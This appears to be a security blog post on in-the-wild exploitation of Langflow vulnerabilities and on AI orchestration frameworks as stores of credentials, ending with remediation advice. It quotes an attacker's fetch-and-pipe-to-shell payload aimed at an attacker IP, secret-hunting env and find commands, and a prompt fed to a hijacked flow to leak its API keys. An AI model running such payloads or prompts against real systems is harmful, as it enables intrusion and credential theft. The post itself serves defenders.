Langflow RCE and the AI Orchestration Attack Surface

Somewhere around hour twenty, a honeypot that Sysdig's threat research team had stood up specifically to watch this happen caught the moment the theory turned into a fact. The advisory for CVE-2026-33017 went out on March 17. No public proof-of-concept existed yet. By the next morning, automated scanners were sweeping the internet for exposed instances, and shortly after that an attacker was inside one of the decoys running env to dump the process environment and hunting the filesystem for anything that looked like a secret.

env
find /app -name "*.db" -o -name "*.env"

They weren't there for the box. They were there for what the box was holding.

The box was Langflow -- the open-source, drag-and-drop tool a lot of teams used through 2025 to wire up LLM agents and RAG pipelines without writing much code. And the thing worth sitting with is not that a popular tool had a bad bug. It's that the bug was ordinary, the exploitation was trivial, and the payoff was a wallet full of somebody else's API keys. That combination is not a Langflow problem. It's a category problem, and Langflow is just the instance that got caught first.

CVE-2026-33017 is about as clean as remote code execution gets. Langflow exposes an endpoint whose entire job is to build "public flows," so it's intentionally unauthenticated:

POST /api/v1/build_public_tmp/{flow_id}/flow

The intent was that this endpoint would build a flow from the definition already stored on the server. What it actually did, in every release before 1.9.0, was accept attacker-supplied flow data -- Python embedded in the node definitions -- and pass it straight to exec() with no sandbox. That's CWE-306 (missing authentication) stacked on CWE-94 (code injection), and it reduces to a single unauthenticated request:

__import__('os').system('curl hxxp://83[.]142[.]209[.]214:8080/isp.sh | sh')

One HTTP request, no credentials, arbitrary code on the host. CISA added 33017 to the Known Exploited Vulnerabilities catalog on March 25, with an April 8 remediation deadline for federal agencies. Sysdig had already watched it get exploited within roughly twenty hours of a disclosure that shipped no exploit code. The attackers built working exploits from the advisory text.

Here's the part that should bother you more than the RCE.

An orchestration framework is a credential concentrator. Langflow flows embed provider keys, cloud credentials, and database connection strings directly in their component configs, because that's how you get a flow to actually talk to OpenAI or Anthropic or your Postgres box. So when an attacker lands code execution on the host, the loot isn't the compute. It's the pile of keys sitting in the environment, and those keys are liquid -- resellable, or immediately abusable to run up a bill on your provider account.

You don't have to infer the motive. In a later incident on the same platform, Sysdig watched an operator hijack a flow and feed it the prompt leak api keys, coaxing a flow that ran with its own embedded credentials into handing them over. That's the whole game in three words.

And 33017 isn't the only door. CVE-2026-5027 is a path traversal in the file-upload endpoint (POST /api/v2/files) that never sanitized the filename, letting an attacker pack traversal sequences into it and write a file to an arbitrary location on disk. Formally, its CVSS vector requires low privileges rather than none -- but Langflow ships with auto-login enabled by default, which hands an exposed instance a valid session token on request, so on the deployments that got hit the credential barrier was effectively cosmetic. From an arbitrary file write the escalation is context-dependent but not exotic: a write into a location like /etc/cron.d, where permissions allow, turns the next cron run into a shell.

Tenable first contacted Langflow about this on January 20, followed up twice with no substantive response, and disclosed publicly on March 27. The fix was ultimately listed in langflow-base 0.8.3 and Langflow 1.9.0. In-the-wild exploitation showed up months later -- VulnCheck's Caitlin Condon confirmed honeypot hits on June 8. The window is the whole point: public disclosure and mass exploitation were separated by more than two months, and every instance nobody bothered to update sat open the entire time. An exposed instance is an open instance, and nobody has to phish anyone to reach it.

How many are exposed? The firmest number comes from Censys-based analysis, which put roughly 7,000 instances on the public internet -- and even that folds in a year of historical scan data, so the live count runs lower. ProCircular was separately reported as estimating more than 74,000, which I'd treat as the looser figure and which may be counting something different. The exact number matters less than the shape: "someone needed to demo a flow to a stakeholder" is how thousands of Python execution environments ended up on public IPs with no owner and no patch cycle.

Even patching turned out to be a trap here, which is the detail that tells you what kind of ecosystem we're dealing with. JFrog went and empirically tested the version widely reported as fixed -- 1.8.2 -- and found it still exploitable. Their point was blunt and correct: you can't determine whether something is patched by reading what a release note claims, only by checking how the code behaves. The maintainers corrected the affected-version range quickly once JFrog told them, but for a window, the version everyone believed was safe wasn't. If your remediation plan was "upgrade to the fixed release," there was a real chance you upgraded to a still-vulnerable one and closed the ticket. Verify the fix landed. Don't take the changelog's word for it.

This is where it stops being a Langflow story.

The same shape shows up across the orchestration ecosystem. LangChain-core has a path traversal in its legacy prompt-loading API that can read local configuration and secret-bearing files off disk, depending on file type and deployment layout. LangGraph carries an insecure-deserialization chain in its SQLite and Redis checkpoint stores that Check Point walked from SQL injection all the way to code execution -- in self-hosted deployments specifically, where user-controlled input reaches the checkpoint APIs; managed LangSmith wasn't affected. Neither issue has confirmed in-the-wild exploitation yet, and Check Point's disclosure ships working proof-of-concept, so "yet" is carrying its full weight in that sentence. These are the same bug classes -- injection, traversal, deserialization -- that we've been writing and re-writing since long before any of these tools existed. What changed is not the vulnerability. It's the address and the contents.

Merritt Baer, former deputy CISO at AWS, named why this class of failure is hard to see coming better than I can: when it lands, "it will feel like your traditional security program failing" rather than an AI problem. The exploit lives three layers down in a framework your application code imports. Your WAF never inspects the deserializer running underneath it. Your EDR watches the agent server make the same process calls it makes a thousand times a day and waves them through. The alert, if one fires at all, reads like an ordinary incident, because mechanically it is one.

Two honest caveats before anyone forwards this upstairs with the subject line "we're all compromised."

Exposed is not compromised. The reporting confirms scanning volume and exploitation activity, not a tally of successful intrusions -- the roughly 7,000 exposed instances are not 7,000 breached ones. Credential theft is observed behavior in specific incidents; the env dumps and the leak api keys prompt were really seen. But nobody has published an accounting of the total downstream exfiltration across these campaigns, so the aggregate impact stays unquantified. Calibrate accordingly -- the case here doesn't need inflation.

What it does need is for the fixes, which are not exotic, to actually get done. Get these off the public internet -- there is close to no legitimate reason a Langflow or LangGraph instance should answer to the open web; put it behind authentication or a VPN. Authenticate or restrict the specific endpoints that were never meant to face outward. Patch to current, and confirm the patch closed the hole instead of trusting the release notes. Rotate every credential the instance could reach -- provider keys, cloud creds, database strings -- because if it was exposed during any of these windows, the correct assumption is that the keys already walked. Give each of these deployments an owner and put it in the same external attack-surface monitoring that governs the rest of your production estate, rather than letting it live as a science-fair project outside the CMDB. And lean on runtime detection: something like Falco will flag a web process spawning a shell or reading .env without needing a CVE-specific signature, which is exactly what you want on day zero, when no signature exists yet.

The uncomfortable part was never any single CVE. It's that we spent a year handing every team a low-code button that stands up an internet-reachable Python execution environment holding a wallet of API keys, told them to move fast, and never wired those deployments into the security program that governs everything else we run. The frameworks did precisely what they were built to do. The bugs are the same ones we've always had. What's new is where they live and what they're standing next to.

By Sysdig's Zero Day Clock tracking, median time-to-exploit has collapsed from 771 days in 2018 to a matter of hours for the fastest-moving bugs, and attackers already treat AI infrastructure as a first-class target. The only open question is whether the people running it will start treating it like one before the next advisory drops and the twenty-hour clock starts over.

Your Agent Framework Is a Pile of API Keys on a Public IP

Comments

More from this blog

There's No Patch for FortiBleed. Public-Sector Networks Are Where That Hurts Most.

Four Failures, One Excuse: "Patch Faster" Was Never the Answer

Vibe Coding Isn't the Problem. Not Understanding the Stack Is.

I Handed Claude Code the Keys. Turns Out I'm Not the Only One Using Them.

Command Palette

Comments

More from this blog